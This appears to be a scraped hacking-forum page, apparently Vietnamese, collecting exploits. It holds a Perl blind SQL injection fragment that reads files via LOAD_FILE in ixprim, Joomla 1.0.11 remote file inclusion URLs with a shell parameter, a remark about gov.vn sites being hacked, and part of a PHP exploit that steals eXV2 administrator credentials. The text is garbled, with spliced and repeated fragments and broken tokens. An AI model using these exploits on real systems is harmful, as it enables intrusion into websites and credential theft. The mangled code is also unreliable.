# # magic_quotes_gpc=off # ==================== # [SQL] and LOAD_FILE("C:/Program Files/EasyPHP1-8/www/ixprim- 1.2/html/mainfile.php") # REGEXP("define(\"IXP_CODE\", '[PART_OF_IXP_CODE]"); # # magic_quotes_gpc=on # =================== # [SQL] and LOAD_FILE(concat(char(67),char(58),char(47),char(80),char(114),char(111),char (103),char(114), # char(97),char(109),char(32),char(70),char(105),char(108),char(101),char(115),char (47),char(69), # char(97),char(115),char(121),char(80),char(72),char(80),char(49),char(45),char(56 ),char(47),char(119), # char(119),char(119),char(47),char(105),char(120),char(112),char(114),char(105),c har(109),char(45), # char(49),char(46),char(50),char(47),char(104),char(116),char(109),char(108),char( 47),char(109),char(97), # char(105),char(110),char(102),char(105),char(108),char(101),char(46),char(112),c har(104),char(112))) # REGEXP(concat(char(73),char(88),char(80),char(95),char(67),char(79),char(68),c har(69),char(34),char(44), # char(32),char(39),char([PART_OF_IXP_CODE]))) # &sendreq(1,32,"load_file(concat(".concatchar($fpd).")) REGEXP(concat(".concatchar("IXP_CODE\", '")); exit(1); # Determine if the sql request return true or false. # Modify the username's charset if it contain special char. # sleep(2) needed for bypass the antiflood protection. # If the username's length > 19 the exploit doesn't works. # sub sendreq() { my($start,$limit,$sql) = ($_[0],$_[1],$_[2]); my($gchar,$char) = ''; @charset=(0 9) if $sql =~ /^(length|select%20uid)/; @charset=(a z,0 9) if $sql =~ /^select%20uname/; @charset=(a f,0 9) if $sql =~ /^(select%20pass|load_file)/; for($y=$start;$y<=$limit;$y++) { foreach $char (@charset) { print STDERR "\r sploit> $gchar$char"; if($sql !~ /load_file/) { $req = GET $bsql."%20and%20substr((".$sql."),$y,1)=".concatchar($char);} else { $req = GET $bsql."%20and%20".$sql.",".concatchar($gchar.$char)."))";} sleep(2); $res = ($ua->request($req))->content; if($res =~ /<br \/> <div id="comments">/) { $gchar .= $char; last;}} if(($sql =~ /length/) and ($gchar.$char =~ /^([0-9]+)9$/)){ last;}} print STDERR "\n"; return $gchar.$char; } sub concatchar() { my $string = shift; my $temp = ''; for($i=0;$i<length($string);$i++) { $temp .= "char(".ord(substr($string,$i,1)).")"; $temp .= ',' if $i != (length($string)-1); } return $temp; } black_hat_cr(HCE) Joomla 1.0.11 (newest) RFI - Vuln Code: > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ==-=-==-= > [2006-Nov-06] register_globals is On. > > Bug : include_once ( $mosConfig_absolute_path . '/language/' . $mosConfig_lang .'.php' ); > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ==-=-==-= > > Exploit : www.target.com/Jooma/installation/index.php?mosConfig_absolute_path=[shell]? > > www.target.com/Joomla/administrator/components/com_admin/admin.admin.html. php?mosConfig_absolute_path=[shell]? chắc đây là lý do 1 số site gov.vn vừa mới bị hack micimacko(HCE) Joomla Banner Component Index.PHP SQL Injection Vulnerability Code: #!/usr/bin/php -q -d short_open_tag=on <? print_r(' exV2 <= 2.0.4.3 "sort" SQL injection / administrative credentials disclosure exploit mail: retrog@alice.it site: http://retrogod.altervista.org dork: "Powered by eXV2 Vers" '); /* this works regardless of php.ini settings against Mysql >= 4.1 (allowing subs) and if 'messages' module is enabled */ if ($argc<4) { print_r(' Usage: php '.$argv[0].' host path user pass OPTIONS host: target server (ip/hostname) path: path to exv2 user/pass: valide user credentials Options: -T[prefix: specify a table prefix, other than default (exv2_) -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' 2.2.2.2 /exv2/ rgod test -P1.1.1.1:80 php '.$argv[0].' 1.1.1.1 / rgod test -p81 '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy ';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; . ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy "; $ock=fsockopen($parts[0],$parts[1]); if (!$ock). REGEXP(concat(char(73),char(88),char(80),char(95),char(67),char(79),char(68),c har(69),char(34),char(44), # char(32),char(39),char( [PART_ OF_IXP_CODE]))) # &sendreq(1,32,"load_file(concat(".concatchar($fpd).")). Files/EasyPHP1-8/www/ixprim- 1.2/html/mainfile.php") # REGEXP("define("IXP_CODE", ' [PART_ OF_IXP_CODE]"); # # magic_quotes_gpc=on # =================== # [SQL] and LOAD_FILE(concat(char(67),char(58),char(47),char(80),char(114),char(111),char (103),char(114),